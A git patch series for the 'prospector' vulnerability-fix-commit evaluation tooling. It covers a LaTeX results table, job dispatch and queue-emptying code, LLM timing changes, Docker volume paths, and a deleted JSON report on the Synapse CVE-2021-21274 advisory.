z?yv}_?+XY@<_hLKy`u@hNQGd79Zmlkw4&CfbL(L0IA)KC&RY7Ac*h2VR z`-#z`sTM@|EY^Rl06>zMNN1`&LBNr(FK|9lp9Is!W?&5^``NyG=0lklk93A~p~R`w zm?ylZNp;C;4NW}Ranx?(^R98MMdy&ZiuXNQmJ;BHe7Q~n?y*NeAb&pk!OcE}Tm0kk z;k7cD$atK;>Ea_ICN>CIItb|z)MU9S+AN_*ZUZR;I={RwxwU)XqH~gCCiN@*Rus z15V5L?Z;>&&O`#5d$$z0m1?uKN5iS_33+kIfj>T~_g(b+x!+wht`|8zk19EYgTcS9 z`H=Iz0-Ce{0nQyxygkT^M>x=t)1w$q3jg#99}8)^rE?6WJXV7&INSpU-FjYJw4(~G za+tbI1QR>AZx3PzqF=ccZiRYC!mRRmOKqu6x`?`*V(szzpZAsQD_QtV3{IvcD#GH@ zcIbBhb)DEXz>C@~K0#56;B|^M3SX8DQp<_A8++SM03*I~WS?uFmLp~t454C{0T1R4 zgl42$`@`z?&>a$ z7U$7vXHEJf^2zr{zyJL!M*>f!Bi}Z?8B_Qvw0tLJRDdzA;fDgwQRaz=P=*$F5=YRC z<3}p_D&o9GVsgEH_C=9pt5(=QxcY{ba_E52L^mpyK>)UYaqgSwv)q5R6GsSegJM(% zxPQ+oh3XC=dJXIQZBJFRE)~WrhLBTbzknO~?`vsn3rb6}J&jLUl>Lu;_wPSJ5y`9> zi}hMnFq*Ynf)Qv3(l+VioKM8zSi_!T6T|`F8lf4GIU*4l^j-K=HV_X~i}_U0m@w*H z;PYLgZ)OOm12P$UVv(Su$^IKF<@cqvHKZRy0`)erH6D#G?1ic8GkS6^Nc8hkBGlC z_vFux_^=`l>}hIhRV<_|oW3F8A7p8|ynu@)crzEq9*khUIS*rE!KZ0uDCUVty?uv# zh4)1;pY+%znN!r!IDx$%BfmHgTVEeRlZ7ZLne9Ew)>d6#@Jipnpny8a&m-W&ug4c( zPhdAna2rotHfy7+m`y{UB`SHDMW-7%vN!&koB-sT$`OMSyE~gSyl6$Th{O|(dy74+ z?`%ho9t-9bPq!uY3xtR^GIGGi*v;lNDM6IQThU^qptcL)@vD4AhRP^U&YE4>FuG|1 z$Q&F%S-N_+rY?P{I}_&7&Rg1;KkjT|Fk*LhY!(e&RO&B3BR#*zJc?8*KTP;gu*hcj zl%-yxtl$qEkzYO??u>o~%9*S*OvC)FvJ)y34C$Z-U& zlrc&$p0Mfb0$pF;Y_95xK?XY5-MB3?I(4j{4T9={f*0VvAOU_=ea-0N!9Zc38lR>Gb znx_z<$#uZ@)a$fLxgAZ%S3(HLli-O=I&1u=Q&(EwqX5Mz?1g4fw$*8Z9>R+D^wxxq z7~OK600$mAvD6QWgtY@=J7c_E^fj#LWqPOin)7`#)6WCg5Ux{2e%owKLEQEoUSo#S zu8bppv-vG)PVp?>xVfe2)7WDdV&WO|=cB-%4TogZ;J&dhQWQNEOwsb}Rds-<*J~R5 zM2UJF7KHiwNjm#CazgyylKZ;nqq1FIGM z^rk>$?O&XmWkLnKPxbfvAW-76?<) zRgDKm<7@Xng!f~o{Zh2Li<#*dYIo@>sgSLwO`EoDR&BUrY0pL2!2=bU7TsOOwv`v2 zRDA4BVLH-RQa@V40kJv$I-}Z?GzwaTuf4H&b6`})yjnxSw__ zCN9)CDSqlC!V$tNN>=9ozha$QjvP6zN^A~%#p(dVQyWb^iBOb*hhSI~rPlv-K;5+6 zQ}NzA3SA1*+a2kcU;qqdFd?s3PIC;9kD~H+mHBgKY(Y9=*?Kr<$uK(@G)0FDOS%k3!jzj?&tX;j+7_0U0~F^-6i^vsi{dl3h*u7PQw?oE>DY zo{qR`0B~5}CznJ~K>+;q)P&6Lox64E4Dlf2P9*i}aVG|>C@U{A?)2xc>nq-E@rrh6 z-`sebH@$k^s?>xNG^>`QM(tYSS-V+ouKxc3VZfzpNi$_NhdG0uo*GK;6JVD&AjwJQ z;xE)*yJgG+4ilk1pc>!wWVS^x&A8KtdN-a{22e%6kcc5k&}YmlQxmY3S!sZatA7P%2)3Tl2-UtGzsB@Xq1qul>pD& zPK#btf$}>)ym@D^Q)h><2L!9ch&UM9SV5+LO(0L#7yu1tiSUkSZG{!mX4} za3htY`kx}O#S-U@32qnuN%(}n>WVZH@^$svwR>CDO`L^yxJV*>gYk>qevhl$i|vtI zowx0^8#g5UO4SYnwZH$0@hM;Qrz83o_Zk_|VW~O{SuM&9M<&ykzuYrh8b8p5G^kAb zhL49YOgOM+`Y>O<^(121V=SwH#&3dT6Z23i4dMo#N&!DpS&K1M^05j}|t9t`#9U>e>$p%O4O`=DF3(d@jQRbW{;Dm$u3+ z&ObW(K*CcupaB^*#~J33Zld-1^7cHTrd3ZWeYf}lm{=C1h2{E(p5c+}AHBGg(6Z)?)r1h(2Pb){36EcP4I9 zry$k~CWObxIH4GZ@sv1t|eZJ&Lw5KT2_&J$8E6I1YPoAn0$+^&7mBLhUK4bA8-+Pa6e$epC9zh^^ z>`n;h&ED4;nDZ{Cn=PX;Fk?gA@f+w`qvDdLO0|9ykWBzVgSx%?C=Q z6mp>h2Iyt(l3V_!{y(+q1MpC8z<*kET{9e5f@>cANU6b)nAoI)Q2iJ#* zz|&p+{4--U)Fb~saYIXdpm@_@W6mcEj(?&iiizyP-}wAcx!&a8z?Kj3We%Fg_}21U zLaY>xQp5T35nT~x8mhQ47pE*W;KOJ`<|N!A6bqxo*YYpqSG}$%ZlwC5hnrl`8rx-G z8H$g(Z;?PS7bMxwqfA7Kk4XJ-G6`7+{mVb9*F1P@z|evgYYvggR}`Bl*+VEIREQ~3 z0aSM)c-++_4pR9cL+JDrbija6UORk!0|`(@&NG{>(UZ|o)HjSX*r>}8c{7dHUVP@I zWINzlR9|Jy%f(EH=PN?nks5D~H~y64{sXca%Z*hrKs)!9;i#200!|S!GUlBz8c?|8 z@S84?{WG6Q83_odr$WW0E<(ev!V8XF_Ijjtk5ced6-qgsuY3oJJte3=we^fyAd+ zC$W{2kyjSBP|GM2&u>z}w8*F)h%1QLWr9FBV6ZB8sHUHh?I;KXX%?tMZf>lz)MR#z zXycLnaOX^7Xs`8XO|Ybjc1{oF%k)txOmF zLW32a+wVX+XBO}>uFt&Zji(ZIHG(D?Vgv^phx7~y$ZfI8$kxY=M;>){$^CG9BPt*f zYN^ME99+cym0eAy=RIG)xm(F@f_Ou`aOh7L-|hKWr`M8iOV1JW0CcA;&8gL}WuHHW z^>}uj%Mr&S4}e&;nZ^~tRHV`8Six;f=c}09PfXq@$QuFc!PV>6t?lggL8CFS@<#W? z%X!{xu!&HplAmmtU;6PF0R_^2X>Kkh1PQ&%;Z>Ty%m_ zv!Xu`*w}-$5&kMwZ$9zD&XbTH;-)ChFr*xW~89U0q z8zgKsKUDIB#NqRZ+0lF9C4YYF6ZrMQS9mAEX<#K%W@f;(xL2hz!;dtZ9ckob`dP}4 z_oEMbfs?CShCJ`5$umyP0r2C7fe9V1X!vAeFjdU*grt-WfHpk(^%;7Mw02v}p2kk- zK>8Eiz1l{yc5O#~RyG8s+l%F8469mGwQP7kn@#w5)t8^;^(aYGz@dq;huPe!j?w!1 z^r(WotG=9D!HQa%G#?DDLkF*T2SR|zpq2v#(p~h&A<9PLJz{D*ov!rbbI<=)E1;au z_D-*BEHn(i0(`e_{gM0o@*!8Oy28Jvz?e-$qX{h=3GypA%>TUZ0^E z8_%u~)1LGtlEA97$`qN=lzBKfemXe&hEsFB!p4RKRucSb`-LI3yj#57H>3}Z4+%Em zwHtd=ZCGA*H`ulZk{1!+13(}PcD`1x0|G%`M(8t)oTDT%y#cwjUsQ~4hL{PvlLrXi zTek_>p+|KvLwhlYS_$+Odd;0NKUhw{g4&1UqbrAcL2@nZl zl-oQ)-&+U9eqx$MT0sG3;3;Way7%a)WNOXH_YXtt0;p6xZfHIh!_m%o0-D2PiS`0LnCL`Dr0t*;_h;Ols z-cW^#NW*@MLHqV|sjS1FKp{PPVps5W$}Pdt5HBEklktkhIeffrbp>llG3}O>aJQs$ z!;2J^(^^?5-j9SKkaag`&~Gvu%Zd`?HzwxAz60-*lOmgWE29a|Lrpj-=T&SLqLtB? zDMzLtf|KWv7?wFFBI=l<=HnwYf~`aL`ugHB z44@r8hL&&uW1aLj7e?p+gsjAeQ$Ef+{WD$>H#aLeDSM{4j4mk$&zf^YKpSri~R45Wt#ZVtKEKrCXc9H<4NTx*%DNY4k zAjThi0Kn$CjX(~qb}YNtE|U008em-y&8Nmm{7_wMJJRC{L6`95Wed>i&!LZOnJxxm zPN~t@?BJa{cYYf7olN9hvU8*#mB zZ^V~*-hPsVC^*FwtVkAMZ|_sai?YYI=~5bK zsd&W5rH7|h_K}5{9r5wZD@|S4k3=FZ(e2wOtr|{SpXb9v@(!#H0psXWgei>GjTVb3 zE^Qn*1m2aXekcpZP;I4RszB>El5-nk#dd_@8DHWlk*z;yR=DGU5*;I;Rj^Gks<0ni`Lr~2-Aa#h6p^+z;qs3ghA=V>rr=`01K zLH(J$nYK&mJyV2ItO=(wrb*GC9blo5dpUH&ep+a*6DQRj6hD0m9GQ!e=3ho|kiafp z?5G&a_$n#-FlwIhh@m35z{LglMEu6=G zMguJl#|3Yp@8S+ESFFZD-lbARXW_5ITz?VvzVJm5lXGcGUDXkSIV?c%NI6fi5bBa-T=% z&^HNQPRrNeV)Uzpx&HYwfAo9Zre@k?bj9NLs+H=*K~r|5XINjXF7T%}ZP|$7@tY@H zH4>Yuh4ihOHeH-FpYAM-xK5B|ksx(#*u48MXviqT?or2%gW1G!@DOy<6p4I8Kggbp zm{5HasD(OH*;u;6u=?pi>crAuF1T4Vw7noy@rnvkgrW`5)?k=4Cr}@ajL@ebHvO`gQ9rRWcXp(p^SfxNt!_A{jKcIWl4lBz@(P z2O@!2iC~pZH~UDi_a{rNx-2cPYe#i!FxZzEQyRGLcXLCGJb3pWY1?9nXW@^C7txOP zvu9>}so>cp_Ul$ljM3Pszpq(?J9Gd>_GD=h8x5Dx(cn?;1fz|mAK!%G z``LU=j^lI7FHRF^AScuQ$eGIU4I;GT1EPmSnMUD_%poK)r;z+=sxoCJYyeQFgg3@9 zq#d%w8YZmZ9UQjo7^Eb=!J_VF8ZmZ8GVQy-mGn4tgu*Be^^&Bu^sgjnfWB8uF@&Z> zf&AE&mh=vBI}(-ahJa^hD>5<+-M9pF^nXmhh|b{`C>Rv0XdFlfHiRt zkXB?FGM&h-Etui=zm-$oYrAPy)|F}Ev4HkC56g)z#fxQZ7+g$78C#F2ojr)8zVWns z5H}{1XQgC``Zs_3QG4HugQN;{SvSWO$Oy00*ff_ISx`2-xb|6I`;XPlOAeVzUO5gh z$H3x^Kq^qb$cPTZb;fTX@;lWL+c+3oJ(c*CAPvq8U=~ZUSX*60WfoHZg{AvFcYdDN5R>BI+}zC(Pb zgp}f)7ND9w`@A$mV!Eh7gprb*_(zxdfCjB8Wdkd^aaqa%wWf*aVY`P)e#**s7KBNH zAZ_GCasM?*zlN?*DlpdaFkd-mLTpI0AgVr8`RDisn+Nn-)N9FC&YKi@zw0*<`Z7Jx zkyEA8KBEVcdPPo)VR*pM%bW2bJ^NM$kfnBVG3@1z0>*+a|fm+UhXxPknAQEGf z90REoSL%qij9+Ij(;^Az#C;w+cC3YCg{3tm3Ijeu7qgwg>qJWBY*~M)A3-S}lHYyP z`<*hWAHtst0maE*Jf0vB^{a5kc%@j0@|3&6U$4Cy5kr8rI#Vhauk>fH3 zuI+&$Dj!M77y!DP>ky|Y+28)cy)QicbJhmE5aiY?>Y1B=^4#x=`)Qq(GM%g!LeRF&>IHM* z8V6z2`i9hy*$=B%)h7N-2?(veftiv-#J)jj?~z`WtU((e$=qEbgx8g{l5nltDCcqWOPwAoaV@1 z{+fRag)bf_cthlkJ0Oy|kthi`Tq-=5igPk{tz%tWT$+^COiY&ZU|M@^60(T-2R=42 zz4{&PM{-szR0~^gq$0qLhwLGab{4LZwQbFt76~oSoYHEdK*Y~=w@pCTD!m2uL$^1% z>Kjb7ug1(%#F(>6pMYa++MW0m-6J~ASjmi~OctXK+27lKl^m)h-mCtx@sQy9qxK!6 z^_gTaI$%kbSBQSm>Zx8;l3_V%yIpO`*q$n0JZ1*eM3P}FQP`~O9)PFy)Th%95{%fDQRhOy$t<{JsMpXSf?-~E`Eq~EM{Pn@ze_;Xg skCSRv1_AXC{{OE8H2Ht^!M^jlGi$-(PE9w=mv^nQ81+l|plQGTAK!1LTmS$7 literal 0 HcmV?d00001 diff --git a/prospector/evaluation/data/results/summary_execution_results.tex b/prospector/evaluation/data/results/summary_execution_results.tex new file mode 100644 index 000000000..4bed03444 --- /dev/null +++ b/prospector/evaluation/data/results/summary_execution_results.tex @@ -0,0 +1,28 @@ +\begin{table} + \centering + \tiny + \begin{tabular}{ l c c c c c c} + \rowcolor{gray!50} \textbf{Result} & \textbf{MVI} & \textbf{\%} & \textbf{AVI} & \textbf{\%} & \textbf{NVI} & \textbf{\%} \\ + High confidence & 142 & 10.765731614859742 & 976 & 74.56 & 928 & 71.61 \\ %qui era 200 + \begin{tabular}{l} + \quad Commit in reference \\ + \end{tabular} & 0 & 0.0 & 865 & 66.08 & 865 & 66.75 \\ + \begin{tabular}{l} + \quad CVE ID in message \\ + \end{tabular} & 0 & 0.0 & 66 & 5.04 & 32 & 2.47 \\ + \begin{tabular}{l} + \quad CVE ID in Issue \\ + \end{tabular} & 0 & 0.0 & 4 & 0.31 & 1 & 0.08 \\ + \begin{tabular}{l} + \quad Cross Reference \\ + \end{tabular} & 19 & 1.4404852160727823 & 41 & 3.13 & 30 & 2.31 \\ + Medium confidence & 5 & 0.37907505686125853 & 97 & 7.41 & 50 & 3.86 \\ + Low confidence & 3 & 0.22744503411675512 & 90 & 6.88 & 45 & 3.47 \\ + Not found (rank $> 10$) & 46 & 3.4874905231235784 & 35 & 2.67 & 27 & 2.08 \\ + Not reported & 9 & 0.6823351023502654 & 97 & 7.41 & 232 & 17.90 \\ + False Positive & 0 & 0.0 & 14 & 1.07 & 14 & 1.08 \\ + \textbf{Total} & \textbf{1315} & & \textbf{1309} & & \textbf{1296} & + \end{tabular} + \caption{Summary of execution results (MVI=manually-supplied version intervals; AVI=automatically-determined version intervals; NVI=no version intervals supplied)} + \label{tab:tracer_dataset_results} +\end{table} \ No newline at end of file diff --git a/prospector/evaluation/run_multiple.py b/prospector/evaluation/run_multiple.py index fd1320156..dec12161d 100644 --- a/prospector/evaluation/run_multiple.py +++ b/prospector/evaluation/run_multiple.py @@ -104,9 +104,7 @@ def main(argv): # parallel_execution(args.input) # analysis of Prospector report - elif ( - args.analyze and not args.rules and not args.execute and not args.stats - ): + elif args.analyze and not args.rules and not args.execute and not args.stats: analyze_prospector(args.input) elif args.analyze and args.stats and not args.rules and not args.execute: diff --git a/prospector/evaluation/save_results.py b/prospector/evaluation/save_results.py index e7388eafa..fda24f888 100644 --- a/prospector/evaluation/save_results.py +++ b/prospector/evaluation/save_results.py @@ -1,6 +1,3 @@ -from typing import List - - def save_to_json(): pass @@ -9,7 +6,7 @@ def save_to_csv(): pass -def update_latex_table(mode: str, data: List[List[str, str]], file_path: str) -> None: +def update_summary_execution_table(mode: str, data, filepath: str) -> None: """Updates the latex table at {ANALYSIS_RESULTS_PATH}/`file_path`. For this to work, the table latex code from D6.3 for tracer_dataset_results table must be saved in the file. Params: @@ -21,7 +18,7 @@ def update_latex_table(mode: str, data: List[List[str, str]], file_path: str) -> Disclaimer: Partly generated with Claude Opus 3. """ # Read the existing LaTeX table from the file - with open(file_path, 'r') as file: + with open(filepath, 'r') as file: table_lines = file.readlines() # Find the line numbers to edit; CHANGE if table changes! @@ -48,5 +45,8 @@ def update_latex_table(mode: str, data: List[List[str, str]], file_path: str) -> raise IndexError(f"Invalid data structure at row {line_number}, column {j}") # Write the updated table back to the file - with open(file_path, 'w') as file: + with open(filepath, 'w') as file: file.writelines(table_lines) + + print(f"Updated latex table at {filepath}") + From d3338c7549d89a10182477c7c69f3e276299bd7f Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 19 Jul 2024 14:02:20 +0000 Subject: [PATCH 046/130] fixes precision of the rules function --- prospector/evaluation/analyse.py | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 25c3365e5..4fae74359 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -28,10 +28,12 @@ def analyze_results_rules(dataset_path: str): It also generates a bar plot visualising the ferquency of each rule being matched. + + Prints: + Precision of the rules table (D6.3 AssureMOSS) """ print(f"Retrieving data from: {dataset_path}") - dataset_path = "empirical_study/datasets/" + dataset_path + ".csv" - dataset = load_dataset(dataset_path) + dataset = load_dataset(INPUT_DATA_PATH + dataset_path + ".csv") rules, table = {}, {} count = 0 @@ -39,7 +41,7 @@ def analyze_results_rules(dataset_path: str): for itm in dataset: try: r, i, v, id = check_report_get_rules( - dataset_path[:-4], itm[0], itm[4] + PROSPECTOR_REPORT_PATH + dataset_path + "/", itm[0], itm[4] ) if r is not None: count += 1 From f0744721f62338fc602d8b9b13b15679a00b84c7 Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 19 Jul 2024 14:18:43 +0000 Subject: [PATCH 047/130] correctly display number of dispatched jobs --- prospector/evaluation/dispatch_jobs.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index 7af675f2d..d1aae35b3 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -320,6 +320,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): if len(selected_cves) != 0: dataset = [c for c in dataset if c[0] in selected_cves] + dispatched_jobs = 0 for cve in dataset: # Skip already existing reports if os.path.exists(f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json"): @@ -329,6 +330,8 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): # f"\n\n*********\n {cve[0]} ({dataset.index(cve)+1}/{len(dataset)})\n**********\n" # ) + dispatched_jobs += 1 + # Send them to Prospector to run with Connection(redis.from_url(redis_url)): queue = Queue() @@ -349,4 +352,4 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): # print(f"Dispatched job {cve[0]} to queue.") # Sanity Check - print(f"Dispatched {len(dataset)} jobs.") + print(f"Dispatched {dispatched_jobs} jobs.") From d174f20175418862409561e1f15e3e6a330c609a Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 22 Jul 2024 12:50:55 +0000 Subject: [PATCH 048/130] moves execution time measurement for LLM from child to parent function Refactored to capture execution time at a higher level in the call stack, so that even if LLM function doesn't get executed anymore (because the information is found in db), the time of the db retrieval is still measured --- prospector/llm/llm_service.py | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/prospector/llm/llm_service.py b/prospector/llm/llm_service.py index e670f1a4b..e31726393 100644 --- a/prospector/llm/llm_service.py +++ b/prospector/llm/llm_service.py @@ -10,12 +10,9 @@ from llm.prompts.classify_commit import zero_shot as cc_zero_shot from llm.prompts.get_repository_url import prompt_best_guess from log.logger import logger -from stats.execution import execution_statistics, measure_execution_time from util.config_parser import LLMServiceConfig from util.singleton import Singleton -llm_statistics = execution_statistics.sub_collection("LLM") - class LLMService(metaclass=Singleton): """A wrapper class for all functions requiring an LLM. This class is also a singleton, as only a @@ -65,7 +62,9 @@ def get_repository_url( # Shorten the dictionary of references to avoid exceeding the token limit if len(advisory_references) >= 300: sorted_references = dict( - sorted(advisory_references.items(), key=lambda item: item[1]) + sorted( + advisory_references.items(), key=lambda item: item[1] + ) ) advisory_references = dict( itertools.islice(sorted_references.items(), 200) @@ -93,7 +92,6 @@ def get_repository_url( return url - @measure_execution_time(execution_statistics.sub_collection("LLM")) def classify_commit( self, diff: str, repository_name: str, commit_message: str ) -> bool: From 6cbb208cec9777091c06524cfbecb29661b5f67b Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 22 Jul 2024 12:52:16 +0000 Subject: [PATCH 049/130] adds function to stop all jobs on queue --- prospector/datamodel/advisory.py | 2 +- prospector/evaluation/__init__.py | 1 + prospector/evaluation/dispatch_jobs.py | 11 ++++++++++- prospector/evaluation/run_multiple.py | 21 ++++++++++++++++++++- 4 files changed, 32 insertions(+), 3 deletions(-) create mode 100644 prospector/evaluation/__init__.py diff --git a/prospector/datamodel/advisory.py b/prospector/datamodel/advisory.py index b66874c82..55b7ba2bb 100644 --- a/prospector/datamodel/advisory.py +++ b/prospector/datamodel/advisory.py @@ -108,7 +108,7 @@ def analyze(self): # for k, v in self.references.items(): # print(k, v) - logger.debug("References: " + str(self.references)) + # logger.debug("References: " + str(self.references)) # TODO: I should extract interesting stuff from the references immediately ad maintain them just for a fast lookup logger.debug(f"Relevant references: {len(self.references)}") diff --git a/prospector/evaluation/__init__.py b/prospector/evaluation/__init__.py new file mode 100644 index 000000000..6a3ce63c9 --- /dev/null +++ b/prospector/evaluation/__init__.py @@ -0,0 +1 @@ +from .dispatch_jobs import run_prospector_and_generate_report \ No newline at end of file diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index d1aae35b3..4f416ba3e 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -314,7 +314,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): """Dispatches jobs to the queue.""" dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") - # dataset = dataset[:5] + dataset = dataset[:5] # Only run a subset of CVEs if the user supplied a selected set if len(selected_cves) != 0: @@ -353,3 +353,12 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): # print(f"Dispatched job {cve[0]} to queue.") # Sanity Check print(f"Dispatched {dispatched_jobs} jobs.") + + +def empty_queue(): + with Connection(redis.from_url(redis_url)): + queue = Queue("default") + + queue.empty() + + print("Emptied the queue.") diff --git a/prospector/evaluation/run_multiple.py b/prospector/evaluation/run_multiple.py index dec12161d..8026bc792 100644 --- a/prospector/evaluation/run_multiple.py +++ b/prospector/evaluation/run_multiple.py @@ -11,6 +11,7 @@ ) from evaluation.dispatch_jobs import ( dispatch_prospector_jobs, + empty_queue, parallel_execution, ) @@ -85,6 +86,13 @@ def parse_cli_args(args): help="Run in parallel on multiple CVEs", action="store_true", ) + + parser.add_argument( + "-eq", + "--empty-queue", + help="Empty the Redis Queue", + action="store_true", + ) return parser.parse_args() @@ -103,8 +111,19 @@ def main(argv): pass # parallel_execution(args.input) + # Remove all jobs from the queue + elif ( + args.empty_queue + and not args.execute + and not args.parallel + and not args.stats + ): + empty_queue() + # analysis of Prospector report - elif args.analyze and not args.rules and not args.execute and not args.stats: + elif ( + args.analyze and not args.rules and not args.execute and not args.stats + ): analyze_prospector(args.input) elif args.analyze and args.stats and not args.rules and not args.execute: From eef559f01165cd2f5c5ba34bb886c7782b56b75b Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 22 Jul 2024 14:36:10 +0000 Subject: [PATCH 050/130] removes cluttering console output from redis queue, adjusts folder path: one folder for execution with llm and one without --- prospector/docker-compose.yml | 3 +- prospector/evaluation/config.yaml | 7 +- .../steady_dataset/CVE-20201-21274.json | 36097 ---------------- prospector/evaluation/dispatch_jobs.py | 36 +- 4 files changed, 32 insertions(+), 36111 deletions(-) delete mode 100644 prospector/evaluation/data/reports/steady_dataset/CVE-20201-21274.json diff --git a/prospector/docker-compose.yml b/prospector/docker-compose.yml index 3f9e2b1ef..370191b73 100644 --- a/prospector/docker-compose.yml +++ b/prospector/docker-compose.yml @@ -29,7 +29,8 @@ services: dockerfile: docker/worker/Dockerfile volumes: - ./data_sources/reports:/app/data_sources/reports - - ./evaluation/data/reports/:/app/evaluation/data/reports + - ./evaluation/data/reports_with_llm/:/app/evaluation/data/reports_with_llm + - ./evaluation/data/reports_without_llm/:/app/evaluation/data/reports_without_llm depends_on: - redis environment: diff --git a/prospector/evaluation/config.yaml b/prospector/evaluation/config.yaml index 0ec3bb8bc..e11e6643a 100644 --- a/prospector/evaluation/config.yaml +++ b/prospector/evaluation/config.yaml @@ -5,7 +5,10 @@ input_data_path: evaluation/data/input/ # datasets to run prospector on (CSV: ID prospector_reports_path: evaluation/data/reports/ # reports generated by Prospector, sorted by names of input datasets # Analysis Results -analysis_results_path: evaluation/data/results/ +analysis_results_llm_path: evaluation/data/results_with_llm/ +analysis_results_no_llm_path: evaluation/data/results_without_llm/ # Prospector settings -run_containerised: True \ No newline at end of file +prospector_settings: + run_containerised: True + run_with_llm: True \ No newline at end of file diff --git a/prospector/evaluation/data/reports/steady_dataset/CVE-20201-21274.json b/prospector/evaluation/data/reports/steady_dataset/CVE-20201-21274.json deleted file mode 100644 index ca7685dcf..000000000 --- a/prospector/evaluation/data/reports/steady_dataset/CVE-20201-21274.json +++ /dev/null @@ -1,36097 +0,0 @@ -{ - "advisory_record": { - "cve_id": "CVE-2021-21274", - "description": "Synapse is a Matrix reference homeserver written in python (pypi package matrix-synapse). Matrix is an ecosystem for open federated Instant Messaging and VoIP. In Synapse before version 1.25.0, a malicious homeserver could redirect requests to their .well-known file to a large file. This can lead to a denial of service attack where homeservers will consume significantly more resources when requesting the .well-known file of a malicious homeserver. This affects any server which accepts federation requests from untrusted servers. Issue is resolved in version 1.25.0. As a workaround the `federation_domain_whitelist` setting can be used to restrict the homeservers communicated with over federation.", - "reserved_timestamp": 1608595200, - "published_timestamp": 1614360316, - "updated_timestamp": 1627869983, - "repository_url": null, - "references": { - "": 475, - "commit::ff5c4da1289cb5e097902b3e55b771be342c29d6": 7, - "https://github.com/matrix-org/synapse/security/advisories/GHSA-2hwx-mjrm-v3g8": 6, - "https://github.com/matrix-org/synapse/pull/8950": 6, - "https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax": 6, - "https://github.com/features/actions": 3, - "https://github.com/features/packages": 3, - "https://github.com/features/security": 3, - "https://github.com/features/codespaces": 3, - "https://github.com/features/copilot": 3, - "https://github.com/features/code-review": 3, - "https://github.com/features/issues": 3, - "https://github.com/features/discussions": 3, - "https://github.com/features": 3, - "https://docs.github.com": 3, - "https://skills.github.com": 3, - "https://github.blog": 3, - "https://github.com/enterprise": 3, - "https://github.com/team": 3, - "https://github.com/enterprise/startups": 3, - "https://github.com/solutions/industries/healthcare": 3, - "https://github.com/solutions/industries/financial-services": 3, - "https://github.com/solutions/industries/manufacturing": 3, - "https://github.com/solutions/ci-cd": 3, - "https://github.com/solutions/devops": 3, - "https://github.com/solutions/devsecops": 3, - "https://resources.github.com/learn/pathways": 3, - "https://resources.github.com": 3, - "https://github.com/customer-stories": 3, - "https://partner.github.com": 3, - "https://github.com/readme": 3, - "https://github.com/topics": 3, - "https://github.com/trending": 3, - "https://github.com/collections": 3, - "https://github.com/enterprise/advanced-security": 3, - "https://github.com/pricing": 3, - "https://github.com": 3, - "https://docs.github.com/site-policy/github-terms/github-terms-of-service": 3, - "https://docs.github.com/site-policy/privacy-policies/github-privacy-statement": 3, - "https://github.com/security": 3, - "https://www.githubstatus.com/": 3, - "https://docs.github.com/": 3, - "https://support.github.com?tags=dotcom-footer": 3, - "https://github.com/matrix-org/synapse/tree/master/docs/admin_api/purge_room.md": 3, - "https://github.com/matrix-org/synapse/tree/master/docs/admin_api/shutdown_room.md": 3, - "https://github.com/matrix-org/synapse/tree/master/docs/admin_api/rooms.md#delete-room-api": 3, - "https://github.com/dklimpel": 3, - "https://github.com/edwargix": 3, - "commit::9389a88816ddb1eeb70f927da804b921aba0facb": 3, - "https://docs.github.com/articles/managing-disruptive-comments/#hiding-a-comment": 3, - "https://github.com/matrix-org/synapse/pull/8756": 3, - "https://github.com/matrix-org/synapse/pull/8853": 3, - "https://github.com/matrix-org/synapse/pull/8874": 3, - "https://github.com/matrix-org/synapse/pull/8886": 3, - "https://github.com/matrix-org/synapse/pull/8887": 3, - "https://github.com/matrix-org/synapse/pull/8890": 3, - "https://github.com/matrix-org/synapse/pull/8897": 3, - "https://github.com/matrix-org/synapse/pull/8900": 3, - "https://github.com/matrix-org/synapse/pull/8911": 3, - "https://github.com/matrix-org/synapse/pull/8938": 3, - "https://github.com/matrix-org/synapse/pull/8941": 3, - "https://github.com/matrix-org/synapse/pull/8942": 3, - "https://github.com/matrix-org/synapse/pull/8951": 3, - "https://github.com/matrix-org/synapse/pull/8930": 3, - "https://github.com/matrix-org/synapse/pull/8931": 3, - "https://github.com/matrix-org/synapse/pull/8821": 3, - "https://github.com/matrix-org/synapse/pull/8870": 3, - "https://github.com/matrix-org/synapse/pull/8954": 3, - "https://github.com/matrix-org/synapse/pull/8970": 3, - "https://github.com/matrix-org/synapse/pull/8994": 3, - "https://github.com/matrix-org/synapse/pull/8827": 3, - "https://github.com/matrix-org/synapse/pull/8837": 3, - "https://github.com/matrix-org/synapse/pull/8858": 3, - "https://github.com/matrix-org/synapse/pull/8862": 3, - "https://github.com/matrix-org/synapse/pull/8865": 3, - "https://github.com/matrix-org/synapse/pull/8867": 3, - "https://github.com/matrix-org/synapse/pull/8872": 3, - "https://github.com/matrix-org/synapse/pull/8883": 3, - "https://github.com/matrix-org/synapse/pull/8918": 3, - "https://github.com/matrix-org/synapse/pull/8920": 3, - "https://github.com/matrix-org/synapse/pull/8921": 3, - "https://github.com/matrix-org/synapse/pull/8933": 3, - "https://github.com/matrix-org/synapse/pull/8964": 3, - "https://github.com/matrix-org/synapse/pull/8937": 3, - "https://github.com/matrix-org/synapse/pull/8945": 3, - "https://github.com/matrix-org/synapse/pull/8959": 3, - "https://github.com/matrix-org/synapse/pull/8962": 3, - "https://github.com/matrix-org/synapse/pull/8965": 3, - 